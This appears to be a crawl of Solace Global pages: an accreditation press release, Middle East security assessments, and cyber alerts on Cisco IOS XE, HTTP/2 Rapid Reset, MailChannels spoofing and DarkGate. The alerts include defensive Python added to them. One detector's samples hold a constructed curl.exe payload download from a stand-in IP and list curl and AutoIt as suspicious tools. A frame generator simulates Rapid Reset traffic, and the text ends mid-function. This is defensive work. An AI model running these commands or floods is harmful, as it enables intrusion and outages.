                The NCSC’s Cyber Incident Response project aims to offer support to UK organisations that have fallen victim to cyber-attacks, by raising awareness of high-quality incident response providers who can offer external support and advice on how to manage and recover from cyber incidents.

                The initiative builds on the Level 1 scheme, which was developed to assure companies that have the capability to provide incident response services to nationally significant organisations such as regulated industries, central government, and critical national infrastructure.

                With an impressive track record, Solace Cyber has been instrumental in helping companies across the UK recover from ransomware attacks and data breaches. Serving as representatives for International Loss Adjusters and Cyber Insurance companies, Solace covers more than 30,000 commercial businesses nationwide, through our channels, providing hundreds of successful response recoveries.

                Rowland Johnson, President of CREST said, “Congratulations to Solace for gaining NCSC Cyber Incident Response (Level 2) scheme Assured Service Provider status for its incident response services. This means Solace has been assessed as capable of supporting most organisations with common cyberattacks, such as ransomware. It provides valuable assurance to buyers of the high quality of Solace’s incident response services.”

                This prestigious accreditation reaffirms Solace Cyber’s dedication to meeting the NCSC’s stringent standards for both technical and organisational capability. By achieving the Cyber Incident Response (Level 2) status, Solace Cyber continues to demonstrate its unwavering commitment to enhancing the cybersecurity landscape and providing unparalleled support to organisations facing the challenges of cyber threats.

                For media inquiries, please contact: rbessant@solaceglobal.com


                Security in Dubai, UAE and COP28 Climate Change Summit

                The United Nations Climate Change Summit, COP28 will be hosted in Dubai at the end of the month to bring together global leaders in an effort to take action against climate change.

                The Middle East, with its vast energy resources, intricate alliances, and ongoing conflicts, plays a crucial role in the global energy landscape, and the consequences of regional conflicts and geopolitical dynamics in the area have far-reaching implications for the world’s environmental and sustainability goals.

                However, in addition to the long-standing geopolitical tensions and conflicts, the Israel-Hamas war holds the potential to heighten tensions and detract from the success of this summit, with the likely possibility of an increasing security risk to Westerners travelling to Dubai.


                Security factors during COP28 in Dubai

                Many Israeli climate organisations have stated that they will boycott COP28 and it is highly likely that Israel will be forced to withdraw from COP28 entirely due to security concerns.

                However, COP28 will still attract thousands of Westerners, including many world leaders, diplomats and influential businesspeople. It is likely that COP28 represents an attractive target for terrorist actors due to the influx of foreigners and the international publicity of the event.

                On 29 October, the UK’s Foreign, Commonwealth & Development Office (FCDO) issued a warning for British tourists visiting the United Arab Emirates (UAE), indicating an increased threat of terrorist attacks. The advisory warns of a very likely risk of terrorist attacks, which could be indiscriminate and may target places frequented by foreigners. While terror attacks within the UAE are rare and the Emirati counter-terrorist forces are heavily financed and well-trained, there is a realistic possibility that these forces will be overstretched as a result of COP28 and that self-radicalisation within the region will increase as a result of the situation in the Gaza Strip.

                Background on Houthi Movement in Yemen

                In 2004, the Iranian-backed Houthi Movement, otherwise known as Ansar Allah (Supporters of God), rebelled against the Yemeni government with the aspiration of taking control over the entirety of Yemen. The conflict escalated in 2014 when Houthi forces seized Yemen’s capital, Sana’a, and forced the Yemeni government into exile. This led to the deployment of a Saudi-led coalition in 2015 that seeks to establish full territorial control by the internationally recognised government within Yemen.

                The Saudi-led coalition consists of predominantly Sunni and Arab nations such as the UAE, and is backed by Western powers including the USA, UK and France.

                UAE’s involvement in the Yemen conflict

                The UAE’s involvement in the coalition has involved a range of military and logistical support for the government of Yemen, including air strikes, the deployment of troops to Yemen and training local Yemeni militias allied to government forces.

                The UAE’s involvement in the conflict has made it a target for Houthi forces who have developed an arsenal of long-range drones and missiles facilitated by Iran. Houthi forces have conducted numerous drone and missile attacks on the UAE, typically targeting strategic locations in Abu Dhabi and Dubai, such as airports, ports and oil facilities.

                Since 2019, the UAE has significantly reduced its military footprint in Yemen, however it still projects power through its support of a number of militias allied to Yemeni government forces. The Houthis have conducted attacks on the UAE in response to successful military operations by pro-government militias supported by Abu Dhabi, which resulted in a series of high-profile attacks in 2022 against high-profile targets in Abu Dhabi and Dubai.

                While the UAE maintains a sophisticated air-defence capability and has been able to shoot down the majority of projectiles within its airspace, it is likely that the Houthis have sufficient drones and missiles to overwhelm and penetrate UAE air defence.

                The Houthi Movement is currently in talks with Saudi Arabia and other local actors regarding a ceasefire.

                Potential for further destabilisation triggered by the Israel-Hamas War?

                There is a realistic possibility that the Israel-Hamas war destabilises the Middle East, and Iran exploits the situation to order its proxy forces to attack Israeli, Western and anti-Iranian forces and interests throughout the region.

                Houthi forces have attempted drone and missile attacks on Israel in response to the Israel Defence Forces (IDF) military activity in the Gaza Strip, with all attacks to date intercepted by IDF or US air defence.

                There is a realistic possibility that both Saudi and the UAE will be forced to respond to Houthi attacks which will invariably provoke retaliatory attacks from the Houthis. Moreover, there is also a realistic possibility that the Houthi rebels might seek to exploit the current situation in the Middle East to conduct attacks on the UAE.

                In the event of a wider conflict involving Israel, the Houthi rebels could exploit regional tensions to launch missile and drone attacks, engage in cyber warfare, and employ asymmetric tactics against the UAE, aiming to distract or pressure the UAE due to its involvement in regional security initiatives and the Saudi-led coalition.

                A further motivation for the Houthis, who are backed by Iran and reportedly allied to Hezbollah, would be to present themselves as defenders of the Palestinian cause and target the UAE for its recent normalisation of relations with Israel and ties to the West.

                Potential outcomes for security in Dubai and UAE

                The Supreme Leader of the Houthi Movement has issued a statement declaring that, if the Israel-Hamas conflict is not contained and provokes a US retaliation, the Houthis will respond with drones and missiles. With the Al Dhafra Air Base located just to the south of Abu Dhabi, it is highly likely that Houthi forces will attempt to target the US military and US interests within the UAE.

                For those travelling to the UAE on business or attending COP28, Solace Global Risk facilitates safer travel for corporate travellers, executives and private clients, with travel risk assessments and end-to-end secure journey management.

                Security solutions include intelligence and advisory, latest security alerts through Solace Secure, security trained drivers and airport meet and greet.


                  CVE-2023-20198

                  Cyber Security Alert: Active Exploitation of 0-Day Vulnerability – Cisco IOS XE


                  Overview: A critical patch for Cisco IOS XE devices has been issued. More than 40,000 known exploited Cisco devices have been discovered.

                  Threat Name: CVE-2023-20198

                  Risk Factor: Critical

                  Date: 24th Oct 2023


                  Solace Cyber security specialists can secure your estate with patching and conduct forensic analysis

                  What We Know About The Attack

                  Cisco has announced that a known zero-day CVE-2023-20198 is currently being exploited. This vulnerability has the highest CVSS score of 10. It is a privilege escalation vulnerability allowing an unauthenticated attacker to create a high privilege account on the affected system.

                  During the known attack, Cisco has observed the use of another vulnerability, CVE-2023-20273. This CVE allows a remote authenticated attacker to inject arbitrary commands as the root user. The number of detected implants on affected devices plummeted over the weekend, likely because the threat actors modified the implant to evade detection.

                  The threat actor’s intentions are unknown. It is currently believed that over 40K devices have implants. (24/10/23)

                  Which Organisations Are Affected By This Attack?

                  Any organisation using Cisco IOS XE devices. The following questions about the configuration of your devices’ HTTP server feature need to be addressed:

                  Is it set up with either HTTP or HTTPS management? If it is configured this way and remains unpatched, there is potential for exploitation.

                  Do you operate any services that rely on HTTP or HTTPS communication, such as eWLC? If the answer is no, it is advisable to deactivate the HTTP Server feature. However, if the answer is yes, consider limiting access to those services to trusted networks, if feasible.

                  Solace Cyber Recommendations

                  To ensure that your systems have not been compromised, it is essential to follow these steps:

                  1. Check for Compromise: Refer to Cisco’s guidance, where they have released a specific curl command to assist in the verification process. This command will help you assess if there are any malicious artifacts present on the Cisco devices that are linked to this activity.
                  2. Disable the HTTP Server Feature or Limit its Access: On all devices that are exposed to the internet, it is highly recommended to disable the HTTP server feature. This will eliminate a potential attack vector and reduce the risk of unauthorised access through this avenue. By doing so, you are taking proactive steps to enhance the security of your network infrastructure. Alternatively, make the feature accessible only to trusted IP addresses.
                  3. Patch Your Cisco IOS XE Devices: It is of utmost importance to apply the latest security patches to your Cisco IOS XE devices without delay. Timely patching is a critical aspect of maintaining a secure network environment. By keeping your devices up to date with the latest security updates, you are fortifying your infrastructure against known vulnerabilities and reducing the likelihood of exploitation by malicious actors.
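As an added example (not Cisco’s guidance or tooling), the following Python audits a saved running-config for the HTTP server exposure addressed in step 2 and emits the configuration lines that close it; the sample configs, the MGMT-HOSTS ACL name and the 192.0.2.0/24 network are constructed placeholders.

```python
"""Added example: audit a saved Cisco IOS XE running-config for the web UI
exposure behind CVE-2023-20198 and emit the remediation the alert describes.
Illustrative code written for this page, not Cisco tooling. The sample configs
below are constructed; the ACL name and address range are placeholders."""
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class HttpServerPosture:
    http_enabled: bool = False           # "ip http server" present (plaintext web UI)
    https_enabled: bool = False          # "ip http secure-server" present
    access_class: Optional[str] = None   # ACL named in "ip http access-class ..."
    findings: List[str] = field(default_factory=list)


def audit_http_server(running_config: str) -> HttpServerPosture:
    """Walk 'show running-config' output and report whether the web UI is
    enabled and whether it is bound to a source-address restriction."""
    p = HttpServerPosture()
    for raw in running_config.splitlines():
        line = raw.strip()
        if line == "ip http server":
            p.http_enabled = True
        elif line == "ip http secure-server":
            p.https_enabled = True
        elif line.startswith("ip http access-class "):
            # Forms: "ip http access-class 10" or "ip http access-class ipv4 NAME"
            p.access_class = line.split()[-1]
    if not (p.http_enabled or p.https_enabled):
        p.findings.append("OK: HTTP/HTTPS server feature is disabled")
        return p
    if p.http_enabled:
        p.findings.append("HIGH: 'ip http server' enabled (plaintext web UI)")
    if p.https_enabled:
        p.findings.append("HIGH: 'ip http secure-server' enabled")
    if p.access_class is None:
        p.findings.append("HIGH: no 'ip http access-class' set; web UI reachable "
                          "from any source address")
    else:
        p.findings.append(f"INFO: web UI limited by access-class {p.access_class}; "
                          "confirm the ACL permits only trusted management hosts")
    return p


def remediation_commands(p: HttpServerPosture, web_ui_required: bool,
                         trusted_acl: str = "MGMT-HOSTS",
                         trusted_net: str = "192.0.2.0 0.0.0.255") -> List[str]:
    """IOS XE config lines for step 2 of the alert: disable the feature where it
    is not needed; otherwise keep HTTPS only and bind it to a trusted-host ACL.
    ACL name and network are placeholders (TEST-NET-1 is used for the sample)."""
    if not web_ui_required:
        return ["no ip http server", "no ip http secure-server"]
    cmds: List[str] = []
    if p.http_enabled:
        cmds.append("no ip http server")          # never expose plaintext management
    if not p.https_enabled:
        cmds.append("ip http secure-server")
    if p.access_class is None:
        cmds += [f"ip access-list standard {trusted_acl}",
                 f" permit {trusted_net}",
                 f"ip http access-class ipv4 {trusted_acl}"]
    return cmds


# Constructed sample configs (not taken from any real device).
EXPOSED_CONFIG = """\
hostname edge-rtr
ip http server
ip http secure-server
ip http authentication local
line vty 0 4
 transport input ssh
"""
HARDENED_CONFIG = """\
hostname edge-rtr
no ip http server
no ip http secure-server
line vty 0 4
 transport input ssh
"""

if __name__ == "__main__":
    for name, cfg in (("exposed", EXPOSED_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, *audit_http_server(cfg).findings, sep="\n  ")
    print("\n".join(remediation_commands(audit_http_server(EXPOSED_CONFIG),
                                         web_ui_required=False)))
```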

                  In summary, following these steps diligently will help you mitigate the risks associated with the disclosed vulnerabilities, maintain the security of your network, and protect your systems and data from potential threats.


                    Israel’s Military Strategy and Biden’s Visit

                    Current Assessment of Israel Hamas Conflict

                    Intelligence cut-off time 11:00 GMT 17th of October 2023

                    Whilst it remains almost certain that the Israeli Defence Forces (IDF) will commit to a ground offensive in the Gaza Strip, this is unlikely to occur within the next 24-48 hours.

                    The main factor contributing to the postponement is the recent revelation of President Biden’s visit to Israel for discussions with Israeli Prime Minister Benjamin Netanyahu on Wednesday 18 October. It is highly unlikely that the US will sponsor an IDF invasion while President Biden is within Israel, due to the threat of Hezbollah retaliation from Lebanon, which will almost certainly be backed by the Iranian regime, or from one of the other militant groups operating out of the West Bank. It is estimated that Hezbollah alone has amassed a stock of over 150,000 rockets. While most of these rockets are crude and unguided munitions that range out only to 10-40km, Hezbollah also maintains a stock of more sophisticated Iranian-derived rocket and missile systems such as the Fateh-110 (250-300km), SCUD-B/C/D (300-550km) and the Zelzal 1/2 ballistic missiles (125-250km). Such weapon systems enable Hezbollah to target high-value targets such as Ben Gurion airport with a high degree of accuracy. While it is expected that Israel’s Iron Dome air defence system will detect and intercept the majority of rockets, there is a realistic possibility that Hezbollah could launch missile and rocket salvos large enough to overwhelm the air defence system.

                    Given the missile and rocket threat posed by Hezbollah and the fact Hamas have now likely fired the majority of their rockets, there is a realistic possibility that the IDF will be forced to reposition mobile elements of its Iron Dome system to counter the emerging threat in the north.

                    Iran’s Involvement with Israel Hamas Conflict

                    Iran has warned that its proxy forces will conduct “pre-emptive action” in response to Israel’s retaliatory strikes on Gaza, which will invariably include the use of Hezbollah forces. However, it is unlikely that Hezbollah will conduct any major attacks with President Biden in Israel for fear of a major US retaliation.

                    Moreover, it is more likely that Hezbollah and Iran will wait until Israel commits forces to Gaza, as the IDF will then have a considerable amount of its forces fixed in the south, offering a tactically advantageous position to open up a northern front that will almost certainly stretch IDF forces and complicate Israeli re-supply and sustainment. To counter Iran and its proxies’ threats, the US has moved its USS Gerald Ford-led Carrier Strike Group (CSG) 12 into the Eastern Mediterranean and has deployed a second CSG, led by the USS Eisenhower, to the Mediterranean; it is currently in the eastern Atlantic and is expected to enter the eastern Mediterranean in the next couple of days. The combined combat power of two US CSGs will provide Israel with overwhelming air superiority should the US enter the conflict alongside Israel, with warnings already issued to Iran that the US will engage Iranian proxy forces. It is highly likely that Israel will delay a ground offensive until the USS Eisenhower is positioned in the eastern Mediterranean.

                    Expectations for Biden’s Visit to Israel

                    It is expected that Biden will discuss with Netanyahu the evacuation of civilians from the Gaza Strip through the Rafah crossing with Egypt. It is likely that Biden will demand that a humanitarian corridor is established before IDF forces enter Gaza, with Biden also forecast to visit Egypt, where he will likely use diplomatic pressure to demand the same from Egypt. It is likely that the IDF will want to commit forces sooner rather than later, as any delay will afford Hamas and other militants time to prepare defensive positions and mobilise forces. However, Israel is hugely dependent on US military aid, which currently stands at approximately USD 4 billion per annum. It is unlikely that Israel has weapon stocks high enough to sustain military operations whilst maintaining enough weaponry to counter Hezbollah or deal with a wider conflict. Therefore, it is likely that Israel will have to submit to US requests in order to guarantee the delivery of future military aid and will not commit to a ground offensive until Biden has some reassurances from Tel Aviv.

                    Alternative Analysis

                    Hezbollah, under orders from Iran will launch a pre-emptive attack on Israel prior to the arrival of President Biden. Such a move will provoke Israel into retaliating and committing to a ground offensive in Gaza before the Rafah crossing is opened and civilians are evacuated, causing an acute humanitarian crisis. This will undoubtedly provoke much international condemnation, resulting in anti-Israeli protests and rhetoric and potentially force the West to temper its support of Israel.

                    Solace Global Security Within Israel

                    Whether you are considering an evacuation or seeking to continue operations while ensuring the safety of your team, we are here to assist.

                    For those seeking a secure exit from Israel, Solace Global offers comprehensive journey management services:

                    • Private Charter Flights: Flight options are available to various destinations across Europe.
                    • Secure Ground Transportation: Secure movement within Israel, ensuring access to open land borders and maritime evacuation points.
                    • Armed or unarmed English-speaking security-trained drivers, Close Protection Officers (CPOs), and discreet, low-profile vehicles at your disposal.

                    CVE-2023-44487

                    Cyber Security Alert: Record-breaking DDoS attack using the HTTP/2 Rapid Reset vulnerability


                    Overview: A small botnet has leveraged a HTTP/2 vulnerability to cause a record-breaking DDoS attack.

                    Threat Name: CVE-2023-44487

                    Risk Factor: Medium

                    Date: Oct 2023


                    Solace Cyber security specialists can secure your estate with patching and conduct forensic analysis

                    What We Know About The HTTP/2 DDoS Attack

                    Cloudflare detected an unprecedented DDoS attack on August 25, 2023, reaching a peak of over 201 million requests per second, three times larger than Cloudflare’s previous record. The attack exploited a weakness in the HTTP/2 protocol and was executed by a modest botnet comprising 20,000 machines.

                    Cloudflare reported that the entire web experiences 1-3 billion requests per second, suggesting that using this method, attackers could concentrate the equivalent of the entire web’s volume of requests on a few specific targets. Similar attacks have also been observed by Google and AWS in recent weeks.

                    This vulnerability allows an attacker to deplete the victim’s server resources by repeatedly sending and canceling requests in rapid succession, ultimately impacting the targeted website or application.
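To show what that send-and-cancel pattern looks like on the wire and how a server can bound it, here is an added Python example (not code from Cloudflare or any HTTP/2 implementation) that parses raw frames and applies a per-connection budget on cancels of streams the server has not yet answered; the traffic is constructed byte strings, and the budget of 100 resets per second is an assumed tuning value.

```python
"""Added example (not code from Cloudflare, Google or any HTTP/2 server): parse
raw HTTP/2 frames and apply the defensive heuristic behind the Rapid Reset
mitigations: a per-connection budget on client cancels of streams the server
has not yet answered. All traffic below is constructed byte strings."""
import struct
from collections import deque
from typing import Deque, List, Set, Tuple

FRAME_HEADERS = 0x1      # opens a stream, i.e. a request
FRAME_RST_STREAM = 0x3   # cancels a stream
ERR_CANCEL = 0x8         # RST_STREAM error code CANCEL
FLAG_END_HEADERS = 0x4

Frame = Tuple[int, int, int, bytes]  # (type, flags, stream_id, payload)


def build_frame(ftype: int, flags: int, stream_id: int, payload: bytes = b"") -> bytes:
    """Frame header (RFC 9113 s4.1): 24-bit length, type, flags, 31-bit stream id."""
    return (len(payload).to_bytes(3, "big") + bytes([ftype, flags])
            + struct.pack("!I", stream_id & 0x7FFFFFFF) + payload)


def parse_frames(data: bytes) -> List[Frame]:
    """Split a byte string into frames, rejecting truncated or trailing bytes."""
    frames: List[Frame] = []
    off = 0
    while off + 9 <= len(data):
        length = int.from_bytes(data[off:off + 3], "big")
        ftype, flags = data[off + 3], data[off + 4]
        stream_id = struct.unpack("!I", data[off + 5:off + 9])[0] & 0x7FFFFFFF
        payload = data[off + 9:off + 9 + length]
        if len(payload) != length:
            raise ValueError("truncated frame")
        frames.append((ftype, flags, stream_id, payload))
        off += 9 + length
    if off != len(data):
        raise ValueError("trailing bytes after last frame")
    return frames


class RapidResetGuard:
    """Counts RST_STREAM frames the client sends for streams the server has not
    yet answered, within a sliding window. A cancelled stream stops counting
    toward SETTINGS_MAX_CONCURRENT_STREAMS, so that limit alone does not bound
    the work one connection can request; this budget does."""

    def __init__(self, max_resets: int = 100, window_s: float = 1.0):
        self.max_resets = max_resets      # assumed tuning value, not a standard
        self.window_s = window_s
        self.unanswered: Set[int] = set()
        self.reset_times: Deque[float] = deque()
        self.terminate = False

    def on_response_sent(self, stream_id: int) -> None:
        self.unanswered.discard(stream_id)  # a cancel after a response is normal

    def on_client_frame(self, t: float, frame: Frame) -> bool:
        """Feed one client frame received at time t; True means GOAWAY and close."""
        ftype, _flags, stream_id, _payload = frame
        if ftype == FRAME_HEADERS and stream_id:
            self.unanswered.add(stream_id)
        elif ftype == FRAME_RST_STREAM and stream_id in self.unanswered:
            self.unanswered.discard(stream_id)
            self.reset_times.append(t)
        while self.reset_times and t - self.reset_times[0] > self.window_s:
            self.reset_times.popleft()
        if len(self.reset_times) > self.max_resets:
            self.terminate = True
        return self.terminate


def analyse_connection(events: List[Tuple[float, bytes]],
                       guard: RapidResetGuard) -> Tuple[bool, int]:
    """Replay (timestamp, raw bytes) from one client connection; returns
    (terminated, RST_STREAM frames seen up to the decision)."""
    resets = 0
    for t, raw in events:
        for frame in parse_frames(raw):
            resets += frame[0] == FRAME_RST_STREAM
            if guard.on_client_frame(t, frame):
                return True, resets
    return False, resets


def constructed_rapid_reset(n: int) -> List[Tuple[float, bytes]]:
    """n request/cancel pairs 50 microseconds apart. The HEADERS payload is a
    stand-in for an HPACK block; the guard never needs to decode it."""
    events = []
    for i in range(n):
        sid = 2 * i + 1  # client-initiated streams use odd ids
        events.append((i * 50e-6,
                       build_frame(FRAME_HEADERS, FLAG_END_HEADERS, sid, b"\x82\x84")
                       + build_frame(FRAME_RST_STREAM, 0, sid, struct.pack("!I", ERR_CANCEL))))
    return events


def constructed_browsing() -> List[Tuple[float, bytes]]:
    """Five requests over a second and one user cancel: far below the budget."""
    events = [(0.2 * i, build_frame(FRAME_HEADERS, FLAG_END_HEADERS, 2 * i + 1, b"\x82\x84"))
              for i in range(5)]
    events.append((1.1, build_frame(FRAME_RST_STREAM, 0, 7, struct.pack("!I", ERR_CANCEL))))
    return events
```

Running `analyse_connection(constructed_rapid_reset(200), RapidResetGuard())` terminates the connection at the 101st cancel, while the browsing sample completes with a single counted reset.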

                    CISA has added this vulnerability to its Known Exploited Vulnerabilities catalogue: https://www.cisa.gov/news-events/alerts/2023/10/10/cisa-adds-five-known-vulnerabilities-catalog

                    What’s The Impact of the DDoS Attack?

                    The identified vulnerability predominantly poses a threat to the availability of systems. In light of this, if your business relies on external web servers for its operations, it is imperative to take proactive measures to safeguard against potential disruptions. This entails diligently implementing the latest updates for your webservers and fortifying your defenses with resilient Distributed Denial of Service (DDoS) mitigation strategies.

                    To address this vulnerability effectively, it is crucial to patch all accessible web services that utilize the HTTP/2 protocol. Regularly updating and patching these services is pivotal to staying ahead of potential exploits, ensuring that your systems are fortified against emerging threats.

                    How Do I Protect My Business?

                    Incorporating a comprehensive approach to cybersecurity is essential. This involves not only staying current with software updates but also implementing robust DDoS mitigation methods. By doing so, you establish a proactive defense mechanism, capable of swiftly identifying and neutralizing any attempts to exploit vulnerabilities.

                    In essence, a multi-faceted security strategy is essential for any organisation reliant on external web servers. Through diligent updates, particularly for HTTP/2-utilizing web services, and the implementation of robust DDoS mitigation measures, you fortify your business against potential disruptions, thereby safeguarding the availability of critical systems integral to your operations.

                    Solace Cyber Recommendations

                    Swiftly update your webservers by applying the available software updates for Apache, Tomcat, IIS, .NET, nghttp2, and h2o.

                    Mitigate the impact of potential DDoS attacks on your organisation by implementing DDoS mitigation services.

                    Solace is ready to support you in ensuring that your security products are up to date with the latest patches and can provide assistance with any inquiries regarding DDoS mitigation methods.


                      Cyber Security Alert: Do you use MailChannels? 2M domains open to phishing attacks.


                      Overview: Security researchers recently uncovered a straightforward method to spoof more than 2 million domains, raising significant concerns in the cyber security community.

                      Risk Factor: Critical

                      Date: Sept 2023


                      Solace Cyber security specialists can perform a detailed mail security review and assist you with your supply chain risk.

                      What We Know About The MailChannels Spoofing Issue

                      The news comes after the recent Defcon hacking conference, where Marcello Salvati, a researcher affiliated with Rapid7, gave an eye-opening talk that demonstrated a method for leveraging the “biggest transactional email service” and Cloudflare, effectively circumventing the safeguards of SPF (Sender Policy Framework) and DMARC (Domain-based Message Authentication, Reporting, and Conformance).

                      While the initial insights shared during the talk have seen some partial mitigation measures implemented, particularly with the use of Cloudflare workers and MailChannels, a disconcerting concern still persists.

                      What is the ongoing risk to MailChannels Users?

                      The issue poses a substantial risk for MailChannels customers, as well as those whose hosting providers rely on their services. Even if your domain has SPF and DMARC measures well-configured, the possibility remains that your domain could be maliciously spoofed by other MailChannels customers.

                      This alarming revelation underscores the persistent challenges in ensuring the security and authenticity of email communications, compelling organisations to remain vigilant and consider additional protective measures to safeguard their digital identities.

What’s The Impact on MailChannels Services?

Including the MailChannels SPF record in a domain’s SPF policy may expose that domain and its users to impersonation. A remedy has recently been introduced to address this concern, but since a significant portion of the 2 million affected domains lacks this protective measure, the door remains open to widespread misuse of the MailChannels service.

The researcher highlights the absence of sender identity verification: anyone can register on the MailChannels website for a mere $80 and use the “normal” SMTP relay to spoof the domains of other MailChannels customers.

A further discovery was the adoption of ARC (Authenticated Received Chain), which inherently reduces spam scores.

Solace Cyber’s threat researchers have validated these findings over SMTP and confirmed them as genuine threats, emphasising the importance of organisations implementing countermeasures promptly.

Solace Cyber Recommendations

Ensure that your organisation has adequate email safeguards activated, including SPF, DMARC, and DKIM.

Confirm the integrity of your SPF record and check whether it includes MailChannels; if it does, the entry will look like this: “include:relay.mailchannels.net”. Verify that every other entry in your SPF record is necessary. If the MailChannels entry is not needed, remove it from your SPF configuration, along with any other superfluous entries.

Alternatively, if you do require the MailChannels SPF record, add the recommended MailChannels lockdown TXT record. You may need to speak to your web hosting provider.

1. Create a DNS TXT record named _mailchannels.yourdomain.com, replacing yourdomain.com with your domain name.
2. In that TXT record, specify one or more MailChannels account IDs (auth) or sender IDs (senderid) that are permitted to send email for your domain, using the following syntax: v=mc1 auth=myhostingcompany senderid=mysenderid
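The two checks above (is relay.mailchannels.net in the SPF record, and is a v=mc1 lockdown record present) can be scripted. The following is an added example, not code from the alert or from MailChannels: the SPF string, the domain and the auth/senderid values are constructed placeholders, and in practice the TXT values would be obtained by DNS lookups of the domain and of _mailchannels.<domain>.

```python
"""Audit an SPF record for the MailChannels include and build the _mailchannels
lockdown TXT record described above.

Added example, not code from the alert or from MailChannels.  The SPF string,
domain and IDs are constructed placeholders; in practice the TXT values come
from DNS lookups of <domain> and _mailchannels.<domain>.
"""

MAILCHANNELS_INCLUDE = "include:relay.mailchannels.net"
SPF_QUALIFIERS = "+-~?"

# Constructed SPF record for a hypothetical domain (not a real DNS answer).
EXAMPLE_SPF = "v=spf1 include:spf.protection.outlook.com include:relay.mailchannels.net -all"


def spf_terms(txt):
    """Split an SPF TXT value into its mechanisms and modifiers.
    Returns [] when the value is not an SPF record (it must start with v=spf1)."""
    parts = txt.strip().split()
    if not parts or parts[0].lower() != "v=spf1":
        return []
    return parts[1:]


def _is_mailchannels(term):
    # Tolerate a leading qualifier (+, -, ~, ?) and mixed case.
    return term.lstrip(SPF_QUALIFIERS).lower() == MAILCHANNELS_INCLUDE


def uses_mailchannels(txt):
    """True when the SPF record delegates sending authority to the MailChannels relay."""
    return any(_is_mailchannels(t) for t in spf_terms(txt))


def without_mailchannels(txt):
    """The SPF record with the MailChannels include removed, for domains that do
    not actually send through MailChannels."""
    kept = [t for t in spf_terms(txt) if not _is_mailchannels(t)]
    return " ".join(["v=spf1", *kept])


def lockdown_record_name(domain):
    """DNS name of the lockdown record: _mailchannels.<domain>."""
    return "_mailchannels." + domain.strip().rstrip(".").lower()


def build_lockdown(auth_ids=(), sender_ids=()):
    """Build the TXT value 'v=mc1 auth=<id> ... senderid=<id> ...'.
    Refuses an empty record, which would name nobody as an authorised sender."""
    if not auth_ids and not sender_ids:
        raise ValueError("at least one auth= or senderid= value is required")
    fields = ["v=mc1"]
    fields += ["auth=" + a for a in auth_ids]
    fields += ["senderid=" + s for s in sender_ids]
    return " ".join(fields)


def parse_lockdown(txt):
    """Parse a v=mc1 TXT value into {'auth': [...], 'senderid': [...]};
    None when the value is missing or is not a lockdown record."""
    parts = (txt or "").strip().split()
    if not parts or parts[0].lower() != "v=mc1":
        return None
    rec = {"auth": [], "senderid": []}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        if key in rec and value:
            rec[key].append(value)
    return rec


def audit(spf_txt, lockdown_txt=None):
    """Apply the alert's two checks; an empty list means nothing to fix."""
    findings = []
    if uses_mailchannels(spf_txt):
        findings.append("SPF delegates to relay.mailchannels.net")
        if parse_lockdown(lockdown_txt) is None:
            findings.append("no v=mc1 lockdown record: other MailChannels "
                            "customers could send as this domain")
    return findings


if __name__ == "__main__":
    print(lockdown_record_name("example.com"),
          build_lockdown(["myhostingcompany"], ["mysenderid"]))
    for finding in audit(EXAMPLE_SPF):
        print("-", finding)
```

Feed `audit()` the TXT value of your apex domain and, where one exists, of `_mailchannels.<domain>`; a domain that keeps the include but has no v=mc1 record is exactly the case the alert warns about.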

Furthermore, it is advisable to evaluate your supply chain for potential weaknesses in their email configurations.


Cyber Security Alert: Microsoft Teams leveraged to push DarkGate Malware


Overview: Researchers have found that the DarkGate malware strain is being spread by outside parties through phishing campaigns in Microsoft Teams.

Risk Factor: High

Date: August 2023


Solace Cyber security specialists can perform gap analysis of your current AV / EDR products to ensure all endpoints are protected.

What We Know About The Microsoft Teams Phishing Campaign Pushing DarkGate Malware

In a recent incident, security experts at Truesec noticed Microsoft Teams messages originating from third-party accounts, delivering ZIP files that purported to come from the victim’s HR department.

The attack began with a social engineering lure enticing the recipient to open the .zip file, which contained an LNK (shortcut) file masquerading as a PDF document.

Upon execution, the LNK file triggered a VBScript that downloaded a payload using curl.exe and then ran it with AutoIt together with a compiled AutoIt script. VirusTotal identified the resulting file as DarkGate malware.
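The chain described above leaves two signals a defender can look for: a shortcut whose name carries a document extension, and a script host (wscript.exe or cscript.exe) with curl.exe or AutoIt among its descendants. The following detection sketch is an added example, not code from Truesec or the alert; the process events, file names, paths and the 203.0.113.10 address are constructed samples in a Sysmon-like field layout, not real telemetry.

```python
"""Flag the DarkGate delivery chain described above: a shortcut posing as a
document, then a script host (wscript/cscript) whose descendants include
curl.exe or AutoIt.  Added example, not code from Truesec or the alert; the
events below are constructed, Sysmon-style process records, not real telemetry.
"""
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SUSPICIOUS_DESCENDANTS = {"curl.exe", "autoit3.exe"}
DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")

# Constructed process-creation events: pid, parent pid, image path, command line.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\HR\policy.vbs"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl.exe -o C:\Users\alice\AppData\Local\Temp\HR\pkg.zip http://203.0.113.10/pkg.zip"},
    {"pid": 400, "ppid": 200, "image": r"C:\Users\alice\AppData\Local\Temp\HR\AutoIt3.exe",
     "cmd": r"AutoIt3.exe C:\Users\alice\AppData\Local\Temp\HR\script.au3"},
    # Benign: curl run from an interactive shell, with no script host above it.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl.exe https://example.com/"},
]


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(path).lower()


def is_masquerading_lnk(filename):
    """True for names like 'policy.pdf.lnk': a shortcut dressed up as a document."""
    name = filename.lower()
    if not name.endswith(".lnk"):
        return False
    return name[:-4].endswith(DOCUMENT_EXTS)


def scan_archive_listing(names):
    """Return the members of an archive listing that look like disguised shortcuts."""
    return [n for n in names if is_masquerading_lnk(n)]


def ancestor_images(pid, by_pid):
    """Walk ppid links upwards; ancestor image names, nearest first.
    Stops at the root or on a cycle in malformed data."""
    out, seen = [], set()
    ev = by_pid.get(pid)
    while ev is not None and ev["ppid"] in by_pid and ev["ppid"] not in seen:
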